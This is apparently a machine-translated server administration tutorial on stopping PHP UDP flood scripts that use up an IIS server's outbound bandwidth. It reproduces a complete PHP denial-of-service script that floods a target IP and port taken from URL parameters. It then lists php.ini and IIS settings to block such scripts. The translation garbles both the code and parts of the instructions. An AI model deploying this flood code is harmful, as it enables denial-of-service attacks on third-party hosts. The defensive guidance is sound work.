Use PHP code to call sockets and directly use the server's network to attack other IP addresses. Previously I encountered this problem in apache, today we will talk about how to prevent php ddos attacks from occupying the network bandwidth and server resources in iis.
Common php ddos code is as follows:
The Code is as follows: |
Copy code |
$ Packets = 0; $ Ip = $ _ GET ['IP']; $ Rand = $ _ GET ['Port']; Set_time_limit (0 ); Ignore_user_abort (FALSE ); $ Exec_time = $ _ GET ['time']; $ Time = time (); Print "Flooded: $ ip on port $ rand "; $ Max_time = $ time + $ exec_time; For ($ I = 0; I I <65535; $ I ++ ){ $ Out. = "X "; } While (1 ){ $ Packets ++; If (time ()> $ max_time ){ Break; }
$ Fp = fsockopen ("udp: // $ ip", $ rand, $ errno, $ errstr, 5 ); If ($ fp ){ Fwrite ($ fp, $ out ); Fclose ($ fp ); } } Echo "Packet complete ". time ('H: I: s '). "with $ packets (". round ($ packets * 65)/1024, 2 ). "mB) packets averaging ". round ($ packets/$ exec_time, 2 ). "packets/s n "; ?> |
Characteristics:
When IIS is enabled, the outbound bandwidth of the server is used up. That is to say, the server continuously sends packets to others. This is different from the DDOS attack. DDOS constantly receives a large number of packets.
Solution:
Set the value to Off in c: windowsphp. ini.
The Code is as follows: |
Copy code |
Allow_url_fopen = Off |
And:
The Code is as follows: |
Copy code |
; Extension = php_sockets.dll |
The preceding; number must be available, which means to restrict the use of sockets. dll
Then:
The Code is as follows: |
Copy code |
; Ignore_user_abort = On |
Remove the previous; number
Then restart IIS
If the above method still does not work, you can disable PHP extension testing in the extensions allowed in IIS.
NOTE: If your server does not need a running mechanism, php can be disabled. If necessary, you can disable php_sockets.dll. Another way is to block all udp ports, you only need to open some important ports such as 80.